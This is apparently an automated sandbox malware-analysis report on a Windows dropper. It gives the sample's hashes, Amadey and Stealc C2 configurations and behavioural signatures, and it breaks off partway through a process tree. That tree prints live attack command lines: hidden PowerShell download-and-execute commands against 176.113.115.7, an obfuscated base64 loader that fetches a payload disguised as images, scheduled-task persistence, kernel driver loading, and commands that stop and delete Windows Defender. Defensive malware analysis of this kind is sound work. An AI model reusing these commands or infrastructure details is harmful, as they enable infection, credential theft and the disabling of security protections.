Analysis

  • max time kernel
    147s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    26/03/2025, 07:12

General

  • Target

    72d706281b940ed3b12e2c1d2cdc9e0b.exe

  • Size

    1.8MB

  • MD5

    72d706281b940ed3b12e2c1d2cdc9e0b

  • SHA1

    77b6bcdab4d139720480a472378a366553e22fa2

  • SHA256

    806f318390f3fd7ed23c129362e0b11813dd3e86a8dd051352900b06ec193d8d

  • SHA512

    de955a979fbbfe247c847c1d8f30394e8b8c62ed1fa37d3874211d3dafcda845867b0a2ee7be093778aee4de19b425796a8a8527a178c0bc9d084b49d2bbeef1

  • SSDEEP

    49152:92/29CJu5qqezLla7PC1MfktJyRcdLMTrWJoljJ:w+QJwqflWC1mRwLMTrWm

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
  • Blocklisted process makes network request 10 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Run Powershell and hide display window.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 20 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 4 TTPs
  • Uses browser remote debugging 2 TTPs 8 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 22 IoCs
  • Identifies Wine through registry keys 2 TTPs 9 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 42 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 46 IoCs
  • Drops file in Windows directory 14 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 50 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 54 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 39 IoCs
  • Suspicious use of FindShellTrayWindow 23 IoCs
  • Suspicious use of SendNotifyMessage 19 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\72d706281b940ed3b12e2c1d2cdc9e0b.exe
    "C:\Users\Admin\AppData\Local\Temp\72d706281b940ed3b12e2c1d2cdc9e0b.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:3036
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2864
      • C:\Users\Admin\AppData\Local\Temp\10338550101\f037f0daf3.exe
        "C:\Users\Admin\AppData\Local\Temp\10338550101\f037f0daf3.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:2332
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks /create /tn pFoIOma661r /tr "mshta C:\Users\Admin\AppData\Local\Temp\n247GGuU5.hta" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1716
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn pFoIOma661r /tr "mshta C:\Users\Admin\AppData\Local\Temp\n247GGuU5.hta" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:1780
        • C:\Windows\SysWOW64\mshta.exe
          mshta C:\Users\Admin\AppData\Local\Temp\n247GGuU5.hta
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:2112
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'PTI4EMONM03TIM4TGWRMVCLOTK387W0L.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2768
            • C:\Users\Admin\AppData\Local\TempPTI4EMONM03TIM4TGWRMVCLOTK387W0L.EXE
              "C:\Users\Admin\AppData\Local\TempPTI4EMONM03TIM4TGWRMVCLOTK387W0L.EXE"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              PID:2936
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\10338560121\am_no.cmd" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2556
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 2
          4⤵
          • System Location Discovery: System Language Discovery
          • Delays execution with timeout.exe
          PID:1296
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:796
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:960
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2128
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2064
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1520
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1524
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn "fYZtVmanbXi" /tr "mshta \"C:\Temp\V5GxwI9zX.hta\"" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:1028
        • C:\Windows\SysWOW64\mshta.exe
          mshta "C:\Temp\V5GxwI9zX.hta"
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          PID:792
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1728
            • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
              "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              PID:1440
      • C:\Users\Admin\AppData\Local\Temp\10338680101\Q1DOy22.exe
        "C:\Users\Admin\AppData\Local\Temp\10338680101\Q1DOy22.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        PID:1084
        • C:\Windows\system32\cmd.exe
          cmd.exe /c 67e2ff36de8a3.vbs
          4⤵
            PID:2688
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67e2ff36de8a3.vbs"
              5⤵
                PID:2984
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBn@GI@awBt@EE@awBt@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2716
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.gbkmAkm/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
                    7⤵
                    • Blocklisted process makes network request
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2812
          • C:\Users\Admin\AppData\Local\Temp\10338700101\apple.exe
            "C:\Users\Admin\AppData\Local\Temp\10338700101\apple.exe"
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:2004
            • C:\Users\Admin\AppData\Local\Temp\11.exe
              "C:\Users\Admin\AppData\Local\Temp\11.exe"
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:672
              • C:\Windows\system32\cmd.exe
                "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\13EE.tmp\13EF.tmp\13F0.bat C:\Users\Admin\AppData\Local\Temp\11.exe"
                5⤵
                  PID:2964
                  • C:\Users\Admin\AppData\Local\Temp\11.exe
                    "C:\Users\Admin\AppData\Local\Temp\11.exe" go
                    6⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                    PID:1128
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\147A.tmp\148B.tmp\148C.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"
                      7⤵
                      • Drops file in Program Files directory
                      PID:1732
                      • C:\Windows\system32\sc.exe
                        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                        8⤵
                        • Launches sc.exe
                        PID:696
                      • C:\Windows\system32\sc.exe
                        sc start ddrver
                        8⤵
                        • Launches sc.exe
                        PID:2068
                      • C:\Windows\system32\timeout.exe
                        timeout /t 1
                        8⤵
                        • Delays execution with timeout.exe
                        PID:1604
                      • C:\Windows\system32\sc.exe
                        sc stop ddrver
                        8⤵
                        • Launches sc.exe
                        PID:2108
                      • C:\Windows\system32\sc.exe
                        sc start ddrver
                        8⤵
                        • Launches sc.exe
                        PID:2244
                      • C:\Windows\system32\takeown.exe
                        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                        8⤵
                        • Possible privilege escalation attempt
                        • Modifies file permissions
                        PID:1752
                      • C:\Windows\system32\icacls.exe
                        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                        8⤵
                        • Possible privilege escalation attempt
                        • Modifies file permissions
                        PID:736
                      • C:\Windows\system32\sc.exe
                        sc stop "WinDefend"
                        8⤵
                        • Launches sc.exe
                        PID:2024
                      • C:\Windows\system32\sc.exe
                        sc delete "WinDefend"
                        8⤵
                        • Launches sc.exe
                        PID:836
                      • C:\Windows\system32\reg.exe
